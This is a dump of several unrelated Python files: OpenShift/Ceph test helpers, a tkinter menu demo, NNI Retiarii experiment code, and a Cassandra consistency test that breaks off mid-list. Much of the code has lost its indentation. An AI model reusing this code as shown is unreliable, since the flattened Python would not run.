if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
file_path = os.path.dirname(filename)
master_list = get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = 'auth'
check_conf = 'kubeconfig'
node_path = '/home/core/'
if check_auth not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}auth"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
def create_dummy_osd(deployment):
"""
    Replace one of the OSD pods with a pod that contains all data from the
    original OSD but doesn't run the osd daemon. This can be used e.g. for
    direct access to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT,
namespace=config.ENV_DATA.get('cluster_namespace')
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name('dummy', 'osd')
osd_data['metadata']['name'] = dummy_deployment
osd_containers = osd_data.get('spec').get('template').get('spec').get(
'containers'
)
# get osd container spec
original_osd_args = osd_containers[0].get('args')
osd_data['spec']['template']['spec']['containers'][0]['args'] = []
osd_data['spec']['template']['spec']['containers'][0]['command'] = [
'/bin/bash',
'-c',
'sleep infinity'
]
osd_file = tempfile.NamedTemporaryFile(
mode='w+', prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
    dummy_pod = [osd_pod for osd_pod in osd_list if dummy_deployment in osd_pod.name][0]
wait_for_resource_state(
resource=dummy_pod,
state=constants.STATUS_RUNNING,
timeout=60
)
ceph_init_cmd = '/rook/tini' + ' ' + ' '.join(original_osd_args)
try:
        logger.info('The following command should time out after 7 seconds')
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info('Killing /rook/tini process')
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
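# Minimal usage sketch (the deployment name and tool invocation are hypothetical):
#   dummy_deployment, dummy_pod = create_dummy_osd('rook-ceph-osd-0')
#   dummy_pod.exec_cmd_on_pod('ceph-objectstore-tool --help')  # direct access to PG data
#   # cleanup: scale the dummy to 0 and the original deployment back to 1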
def get_failure_domin():
"""
    Get the failure domain of a pool.
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format='json')
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
    In node failure scenarios where the failed node was running the ceph tools
    pod, we'll want to wait for the pod to recover.
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods, previous_num=1,
namespace=config.ENV_DATA['cluster_namespace'], timeout=120,
selector=constants.TOOL_APP_LABEL
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
    Label worker nodes so that app pods can be scheduled on specific workers.
    Args:
        node_list (list): List of node names
        label_key (str): Label key to be added to the worker node
        label_value (str): Label value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}", out_yaml_format=False
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
        node_list (list): List of node names
        label_key (str): Label key to be removed from the worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, 'w') as fh:
fh.write(log_content)
return output_logs
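# e.g. (hypothetical): fail a test run if any node/pod log contains a critical error
#   bad_logs = get_logs_with_errors()
#   assert not bad_logs, f"Errors found in logs of: {list(bad_logs)}"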
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
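    # Derive the deployment name from the pod name,
    # e.g. 'rook-ceph-osd-0-c9c4bc7c-bkf4b' -> 'rook-ceph-osd-0'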
resource_name = '-'.join(resource_name.split('-')[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
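# Minimal usage sketch (the pod name is hypothetical): take an OSD out and bring it back
#   modify_osd_replica_count('rook-ceph-osd-0-c9c4bc7c-bkf4b', 0)
#   modify_osd_replica_count('rook-ceph-osd-0-c9c4bc7c-bkf4b', 1)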
|
menubars.py | from tkinter import *
from tkinter import ttk, messagebox
from halo import Halo
from threading import Thread
def close(app: Tk):
    msg = messagebox.askyesno('Exit App', 'Are you sure you want to quit?', icon='warning')
if msg:
app.destroy()
app.quit()
root = Tk()
menu_bar = Menu(root)
root.geometry('800x600+500+150')
file = Menu(menu_bar, tearoff=False)
edit = Menu(menu_bar)
about = Menu(menu_bar)
# Icons
new_ico = PhotoImage(file='icons/new.png')
open_ico = PhotoImage(file='icons/open.png')
exit_ico = PhotoImage(file='icons/exit.png')
save_ico = PhotoImage(file='icons/save.png')
# Menu
file.add_command(label='New', image=new_ico, compound=LEFT)
file.add_separator()
file.add_command(label='Open', image=open_ico, compound=LEFT)
file.add_separator()
file.add_command(label='Save', image=save_ico, compound=LEFT)
file.add_separator()
file.add_command(label='Exit', image=exit_ico, compound=LEFT, command=lambda:close(root))
menu_bar.add_cascade(label='File', menu=file)
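# The remaining items can be wired up the same way once callbacks exist,
# e.g. (hypothetical callback): file.entryconfig('Open', command=lambda: print('open'))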
root.config(menu=menu_bar)
def start():
    spinner = Halo(text='App is running', placement='right', text_color='green', color='cyan')
    # run the spinner in a daemon thread so it doesn't block the Tk event loop
    t = Thread(target=spinner.start, daemon=True)
    t.start()
    root.mainloop()
    # mainloop() returns once the window has been destroyed via close()
    spinner.stop()
    exit(0)
start() |
pytorch.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import atexit
import logging
import time
from dataclasses import dataclass
import os
from pathlib import Path
import socket
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import colorama
import psutil
import torch
import torch.nn as nn
import nni.runtime.log
from nni.experiment import Experiment, TrainingServiceConfig
from nni.experiment import management, launcher, rest
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from nni.tools.nnictl.command_utils import kill_command
from ..codegen import model_to_pytorch_script
from ..converter import convert_to_graph
from ..execution import list_models, set_execution_engine
from ..execution.python import get_mutation_dict
from ..graph import Model, Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import process_inline_mutation, extract_mutation_from_pt_module
from ..strategy import BaseStrategy
from ..oneshot.interface import BaseOneShotTrainer
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = '_reserved'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: PathLike = '~/nni-experiments'
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
execution_engine: str = 'py'
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
            self.training_service = util.training_service_config_factory(platform=training_service_platform)
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry py'
def __setattr__(self, key, value):
fixed_attrs = {'search_space': '',
'trial_command': '_reserved'}
if key in fixed_attrs and fixed_attrs[key] != value:
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
# 'trial_code_directory' is handled differently because the path will be converted to absolute path by us
if key == 'trial_code_directory' and not (value == Path('.') or os.path.isabs(value)):
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
if key == 'execution_engine':
assert value in ['base', 'py', 'cgo'], f'The specified execution engine "{value}" is not supported.'
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry ' + value
self.__dict__[key] = value
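    # e.g. (hypothetical): reserved fields fail fast when overridden:
    #   cfg = RetiariiExeConfig('local')
    #   cfg.trial_command = 'python3 my_trial.py'  # raises AttributeError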
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
def preprocess_model(base_model, trainer, applied_mutators, full_ir=True):
# TODO: this logic might need to be refactored into execution engine
if full_ir:
try:
script_module = torch.jit.script(base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
base_model_ir = convert_to_graph(script_module, base_model)
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
else:
base_model_ir, mutators = extract_mutation_from_pt_module(base_model)
base_model_ir.evaluator = trainer
if mutators is not None and applied_mutators:
raise RuntimeError('Have not supported mixed usage of LayerChoice/InputChoice and mutators, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
applied_mutators = mutators
return base_model_ir, applied_mutators
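# Minimal sketch of the two paths above (model space and evaluator names are assumed):
#   full_ir=True parses the model into graph IR via torch.jit.script;
#   full_ir=False keeps it as a Python object for the 'py' engine:
#     ir, mutators = preprocess_model(MyModelSpace(), my_evaluator, [], full_ir=False)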
def debug_mutated_model(base_model, trainer, applied_mutators):
"""
Locally run only one trial without launching an experiment for debug purpose, then exit.
For example, it can be used to quickly check shape mismatch.
Specifically, it applies mutators (default to choose the first candidate for the choices)
to generate a new model, then run this model locally.
Parameters
----------
base_model : nni.retiarii.nn.pytorch.nn.Module
the base model
trainer : nni.retiarii.evaluator
the training class of the generated models
applied_mutators : list
a list of mutators that will be applied on the base model for generating a new model
"""
base_model_ir, applied_mutators = preprocess_model(base_model, trainer, applied_mutators)
from ..strategy import _LocalDebugStrategy
strategy = _LocalDebugStrategy()
strategy.run(base_model_ir, applied_mutators)
_logger.info('local debug completed!')
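# Minimal usage sketch (model space and evaluator names are assumed):
#   debug_mutated_model(MyModelSpace(), my_evaluator, applied_mutators=[])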
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
base_model_ir, self.applied_mutators = preprocess_model(
self.base_model, self.trainer, self.applied_mutators, full_ir=self.config.execution_engine != 'py')
_logger.info('Start strategy...')
self.strategy.run(base_model_ir, self.applied_mutators)
_logger.info('Strategy exit')
# TODO: find out a proper way to show no more trial message on WebUI
#self._dispatcher.mark_experiment_as_ending()
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
atexit.register(self.stop)
        # we will probably need an execution engine factory to make this clean and elegant
if self.config.execution_engine == 'base':
from ..execution.base import BaseExecutionEngine
engine = BaseExecutionEngine()
elif self.config.execution_engine == 'cgo':
from ..execution.cgo_engine import CGOExecutionEngine
engine = CGOExecutionEngine()
elif self.config.execution_engine == 'py':
from ..execution.python import PurePythonExecutionEngine
engine = PurePythonExecutionEngine()
set_execution_engine(engine)
self.id = management.generate_experiment_id()
if self.config.experiment_working_directory is not None:
log_dir = Path(self.config.experiment_working_directory, self.id, 'log')
else:
log_dir = Path.home() / f'nni-experiments/{self.id}/log'
nni.runtime.log.start_experiment_log(self.id, log_dir, debug)
self._proc, self._pipe = launcher.start_experiment_retiarii(self.id, self.config, port, debug)
assert self._proc is not None
assert self._pipe is not None
self.port = port # port will be None if start up failed
# dispatcher must be launched after pipe initialized
# the logic to launch dispatcher in background should be refactored into dispatcher api
self._dispatcher = self._create_dispatcher()
self._dispatcher_thread = Thread(target=self._dispatcher.run)
self._dispatcher_thread.start()
ips = [self.config.nni_manager_ip]
for interfaces in psutil.net_if_addrs().values():
for interface in interfaces:
if interface.family == socket.AF_INET:
ips.append(interface.address)
ips = [f'http://{ip}:{port}' for ip in ips if ip]
msg = 'Web UI URLs: ' + colorama.Fore.CYAN + ' '.join(ips) + colorama.Style.RESET_ALL
_logger.info(msg)
exp_status_checker = Thread(target=self._check_exp_status)
exp_status_checker.start()
self._start_strategy()
# TODO: the experiment should be completed, when strategy exits and there is no running job
_logger.info('Waiting for experiment to become DONE (you can ctrl+c if there is no running trial jobs)...')
exp_status_checker.join()
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function will block until experiment finish or error.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
self.start(port, debug)
def _check_exp_status(self) -> bool:
"""
        Poll the experiment status until it finishes or fails; blocks until then.
        Return `True` when the experiment is done, or `False` when it failed.
"""
try:
while True:
time.sleep(10)
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
status = self.get_status()
else:
return False
if status == 'DONE' or status == 'STOPPED':
return True
if status == 'ERROR':
return False
except KeyboardInterrupt:
_logger.warning('KeyboardInterrupt detected')
finally:
self.stop()
def stop(self) -> None:
"""
Stop background experiment.
"""
_logger.info('Stopping experiment, please wait...')
atexit.unregister(self.stop)
if self.id is not None:
nni.runtime.log.stop_experiment_log(self.id)
if self._proc is not None:
try:
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
rest.delete(self.port, '/experiment')
except Exception as e:
_logger.exception(e)
_logger.warning('Cannot gracefully stop experiment, killing NNI process...')
kill_command(self._proc.pid)
if self._pipe is not None:
self._pipe.close()
if self._dispatcher_thread is not None:
self._dispatcher.stopping = True
self._dispatcher_thread.join(timeout=1)
self.id = None
self.port = None
self._proc = None
self._pipe = None
self._dispatcher = None
self._dispatcher_thread = None
_logger.info('Experiment stopped')
def export_top_models(self, top_k: int = 1, optimize_mode: str = 'maximize', formatter: str = 'dict') -> Any:
"""
Export several top performing models.
        For one-shot algorithms, only top-1 is supported. For others, ``optimize_mode`` and ``formatter`` are
        available for customization.
        Parameters
        ----------
        top_k : int
How many models are intended to be exported.
optimize_mode : str
``maximize`` or ``minimize``. Not supported by one-shot algorithms.
``optimize_mode`` is likely to be removed and defined in strategy in future.
formatter : str
Support ``code`` and ``dict``. Not supported by one-shot algorithms.
If ``code``, the python code of model will be returned.
If ``dict``, the mutation history will be returned.
"""
if formatter == 'code':
assert self.config.execution_engine != 'py', 'You should use `dict` formatter when using Python execution engine.'
if isinstance(self.trainer, BaseOneShotTrainer):
assert top_k == 1, 'Only support top_k is 1 for now.'
return self.trainer.export()
else:
all_models = filter(lambda m: m.metric is not None, list_models())
assert optimize_mode in ['maximize', 'minimize']
all_models = sorted(all_models, key=lambda m: m.metric, reverse=optimize_mode == 'maximize')
assert formatter in ['code', 'dict'], 'Export formatter other than "code" and "dict" is not supported yet.'
if formatter == 'code':
return [model_to_pytorch_script(model) for model in all_models[:top_k]]
elif formatter == 'dict':
return [get_mutation_dict(model) for model in all_models[:top_k]]
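    # Minimal usage sketch after a completed run (config construction omitted):
    #   exp = RetiariiExperiment(base_model, evaluator, [], strategy)
    #   exp.run(config, port=8081)
    #   best = exp.export_top_models(top_k=1, formatter='dict')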
def retrain_model(self, model):
"""
        Retrain the exported model and test it to report test accuracy.
"""
raise NotImplementedError
|
consistency_test.py | import queue
import sys
import threading
import time
import pytest
import logging
from collections import OrderedDict, namedtuple
from copy import deepcopy
from cassandra import ConsistencyLevel, consistency_value_to_name
from cassandra.query import BatchStatement, BatchType, SimpleStatement
from tools.assertions import (assert_all, assert_length_equal, assert_none,
assert_unavailable)
from dtest import MultiError, Tester, create_ks, create_cf
from tools.data import (create_c1c2_table, insert_c1c2, insert_columns,
query_c1c2, rows_to_list)
since = pytest.mark.since
ported_to_in_jvm = pytest.mark.ported_to_in_jvm
logger = logging.getLogger(__name__)
ExpectedConsistency = namedtuple('ExpectedConsistency', ('num_write_nodes', 'num_read_nodes', 'is_strong'))
class TestHelper(Tester):
def _is_local(self, cl):
return (cl == ConsistencyLevel.LOCAL_QUORUM or
cl == ConsistencyLevel.LOCAL_ONE or
cl == ConsistencyLevel.LOCAL_SERIAL)
def _is_conditional(self, cl):
return (cl == ConsistencyLevel.SERIAL or
cl == ConsistencyLevel.LOCAL_SERIAL)
def _required_nodes(self, cl, rf_factors, dc):
"""
Return the number of nodes required by this consistency level
in the current data center, specified by the dc parameter,
given a list of replication factors, one per dc.
"""
return {
ConsistencyLevel.ANY: 1,
ConsistencyLevel.ONE: 1,
ConsistencyLevel.TWO: 2,
ConsistencyLevel.THREE: 3,
ConsistencyLevel.QUORUM: sum(rf_factors) // 2 + 1,
ConsistencyLevel.ALL: sum(rf_factors),
ConsistencyLevel.LOCAL_QUORUM: rf_factors[dc] // 2 + 1,
ConsistencyLevel.EACH_QUORUM: rf_factors[dc] // 2 + 1,
ConsistencyLevel.SERIAL: sum(rf_factors) // 2 + 1,
ConsistencyLevel.LOCAL_SERIAL: rf_factors[dc] // 2 + 1,
ConsistencyLevel.LOCAL_ONE: 1,
}[cl]
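        # Worked example with rf_factors = [3, 3, 3]:
        #   QUORUM       -> 9 // 2 + 1 = 5 nodes cluster-wide
        #   LOCAL_QUORUM -> 3 // 2 + 1 = 2 nodes in the local dc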
def get_expected_consistency(self, idx, rf_factors, write_cl, read_cl):
"""
Given a node index, identify to which data center we are connecting and return
the expected consistency: number of nodes we write to, read from, and whether
we should have strong consistency, that is whether R + W > N
"""
nodes = [self.nodes] if isinstance(self.nodes, int) else self.nodes
def get_data_center():
"""
:return: the data center corresponding to this node
"""
dc = 0
for i in range(1, len(nodes)):
if idx < sum(nodes[:i]):
break
dc += 1
return dc
data_center = get_data_center()
if write_cl == ConsistencyLevel.EACH_QUORUM:
write_nodes = sum([self._required_nodes(write_cl, rf_factors, i) for i in range(0, len(nodes))])
else:
write_nodes = self._required_nodes(write_cl, rf_factors, data_center)
read_nodes = self._required_nodes(read_cl, rf_factors, data_center)
is_strong = read_nodes + write_nodes > sum(rf_factors)
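        # e.g. nodes = [3, 3], rf_factors = [3, 3], write QUORUM, read ONE:
        #   write_nodes = 6 // 2 + 1 = 4, read_nodes = 1, and 4 + 1 <= 6,
        #   so is_strong is False (stale reads are possible)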
return ExpectedConsistency(num_write_nodes=write_nodes,
num_read_nodes=read_nodes,
is_strong=is_strong)
def _should_succeed(self, cl, rf_factors, num_nodes_alive, current):
"""
Return true if the read or write operation should succeed based on
the consistency level requested, the replication factors and the
number of nodes alive in each data center.
"""
if self._is_local(cl):
return num_nodes_alive[current] >= self._required_nodes(cl, rf_factors, current)
elif cl == ConsistencyLevel.EACH_QUORUM:
for i in range(0, len(rf_factors)):
if num_nodes_alive[i] < self._required_nodes(cl, rf_factors, i):
return False
return True
else:
return sum(num_nodes_alive) >= self._required_nodes(cl, rf_factors, current)
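    # e.g. EACH_QUORUM with rf_factors = [3, 3] and num_nodes_alive = [2, 1]:
    # dc0 needs 2 (2 alive, ok) but dc1 needs 2 with only 1 alive -> fails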
def _start_cluster(self, save_sessions=False, requires_local_reads=False):
cluster = self.cluster
nodes = self.nodes
rf = self.rf
configuration_options = {'hinted_handoff_enabled': False}
# If we must read from the local replica first, then the dynamic snitch poses a problem
# because occasionally it may think that another replica is preferable even if the
# coordinator is a replica
if requires_local_reads:
configuration_options['dynamic_snitch'] = False
cluster.set_configuration_options(values=configuration_options)
cluster.populate(nodes)
if requires_local_reads and isinstance(nodes, int):
# Changing the snitch to PropertyFileSnitch even in the
# single dc tests ensures that StorageProxy sorts the replicas eligible
# for reading by proximity to the local host, essentially picking the
# local host for local reads, see IEndpointSnitch.sortByProximity() and
# StorageProxy.getLiveSortedEndpoints(), which is called by the AbstractReadExecutor
# to determine the target replicas. The default case, a SimpleSnitch wrapped in
# a dynamic snitch, may rarely choose a different replica.
logger.debug('Changing snitch for single dc case')
for node in cluster.nodelist():
node.data_center = 'dc1'
cluster.set_configuration_options(values={
'endpoint_snitch': 'org.apache.cassandra.locator.PropertyFileSnitch'})
cluster.start()
self.ksname = 'mytestks'
session = self.patient_exclusive_cql_connection(cluster.nodelist()[0])
create_ks(session, self.ksname, rf)
self.create_tables(session, requires_local_reads)
if save_sessions:
self.sessions = []
self.sessions.append(session)
for node in cluster.nodelist()[1:]:
self.sessions.append(self.patient_exclusive_cql_connection(node, self.ksname))
def create_tables(self, session, requires_local_reads):
self.create_users_table(session, requires_local_reads)
self.create_counters_table(session, requires_local_reads)
session.cluster.control_connection.wait_for_schema_agreement(wait_time=60)
def truncate_tables(self, session):
statement = SimpleStatement("TRUNCATE users", ConsistencyLevel.ALL)
session.execute(statement)
statement = SimpleStatement("TRUNCATE counters", ConsistencyLevel.ALL)
session.execute(statement)
def create_users_table(self, session, requires_local_reads):
create_cmd = """
CREATE TABLE users (
userid int PRIMARY KEY,
firstname text,
lastname text,
age int
)"""
if requires_local_reads:
create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
session.execute(create_cmd)
@staticmethod
def get_local_reads_properties(cluster_version):
"""
If we must read from the local replica first, then we should disable read repair and
speculative retry, see CASSANDRA-12092
"""
if cluster_version < '4.0':
return " dclocal_read_repair_chance = 0 AND read_repair_chance = 0 AND speculative_retry = 'NONE'"
else:
return " speculative_retry = 'NONE'"
def insert_user(self, session, userid, age, consistency, serial_consistency=None):
text = "INSERT INTO users (userid, firstname, lastname, age) VALUES ({}, 'first{}', 'last{}', {}) {}"\
.format(userid, userid, userid, age, "IF NOT EXISTS" if serial_consistency else "")
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
def update_user(self, session, userid, age, consistency, serial_consistency=None, prev_age=None):
text = "UPDATE users SET age = {} WHERE userid = {}".format(age, userid)
if serial_consistency and prev_age:
text = text + " IF age = {}".format(prev_age)
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
def delete_user(self, session, userid, consistency):
statement = SimpleStatement("DELETE FROM users where userid = {}".format(userid), consistency_level=consistency)
session.execute(statement)
def query_user(self, session, userid, age, consistency, check_ret=True):
statement = SimpleStatement("SELECT userid, age FROM users where userid = {}".format(userid), consistency_level=consistency)
res = session.execute(statement)
expected = [[userid, age]] if age else []
ret = rows_to_list(res) == expected
if check_ret:
assert ret, "Got {} from {}, expected {} at {}".format(rows_to_list(res), session.cluster.contact_points, expected, consistency_value_to_name(consistency))
return ret
def create_counters_table(self, session, requires_local_reads):
create_cmd = """
CREATE TABLE counters (
id int PRIMARY KEY,
c counter
)"""
if requires_local_reads:
create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
session.execute(create_cmd)
def update_counter(self, session, id, consistency, serial_consistency=None):
text = "UPDATE counters SET c = c + 1 WHERE id = {}".format(id)
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
return statement
def query_counter(self, session, id, val, consistency, check_ret=True):
statement = SimpleStatement("SELECT * from counters WHERE id = {}".format(id), consistency_level=consistency)
ret = rows_to_list(session.execute(statement))
if check_ret:
assert ret[0][1] == val, "Got {} from {}, expected {} at {}".format(ret[0][1],
session.cluster.contact_points,
val,
consistency_value_to_name(consistency))
return ret[0][1] if ret else 0
class TestAvailability(TestHelper):
"""
Test that we can read and write depending on the number of nodes that are alive and the consistency levels.
"""
def _test_simple_strategy(self, combinations):
"""
Helper test function for a single data center: invoke _test_insert_query_from_node() for each node
and each combination, progressively stopping nodes.
"""
cluster = self.cluster
nodes = self.nodes
rf = self.rf
num_alive = nodes
for node in range(nodes):
logger.debug('Testing node {} in single dc with {} nodes alive'.format(node, num_alive))
session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
for combination in combinations:
self._test_insert_query_from_node(session, 0, [rf], [num_alive], *combination)
self.cluster.nodelist()[node].stop()
num_alive -= 1
def _test_network_topology_strategy(self, combinations):
"""
Helper test function for multiple data centers, invoke _test_insert_query_from_node() for each node
in each dc and each combination, progressively stopping nodes.
"""
cluster = self.cluster
nodes = self.nodes
rf = self.rf
nodes_alive = deepcopy(nodes)
rf_factors = list(rf.values())
for i in range(0, len(nodes)): # for each dc
logger.debug('Testing dc {} with rf {} and {} nodes alive'.format(i, rf_factors[i], nodes_alive))
for n in range(nodes[i]): # for each node in this dc
logger.debug('Testing node {} in dc {} with {} nodes alive'.format(n, i, nodes_alive))
node = n + sum(nodes[:i])
session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
for combination in combinations:
self._test_insert_query_from_node(session, i, rf_factors, nodes_alive, *combination)
self.cluster.nodelist()[node].stop(wait_other_notice=True)
nodes_alive[i] -= 1
def _test_insert_query_from_node(self, session, dc_idx, rf_factors, num_nodes_alive, write_cl, read_cl, serial_cl=None, check_ret=True):
"""
Test availability for read and write via the session passed in as a parameter.
"""
logger.debug("Connected to %s for %s/%s/%s" %
(session.cluster.contact_points, consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl)))
start = 0
end = 100
age = 30
if self._should_succeed(write_cl, rf_factors, num_nodes_alive, dc_idx):
for n in range(start, end):
self.insert_user(session, n, age, write_cl, serial_cl)
else:
assert_unavailable(self.insert_user, session, end, age, write_cl, serial_cl)
if self._should_succeed(read_cl, rf_factors, num_nodes_alive, dc_idx):
for n in range(start, end):
self.query_user(session, n, age, read_cl, check_ret)
else:
assert_unavailable(self.query_user, session, end, age, read_cl, check_ret)
def test_simple_strategy(self):
"""
Test for a single datacenter, using simple replication strategy.
"""
self.nodes = 3
self.rf = 3
self._start_cluster()
combinations = [
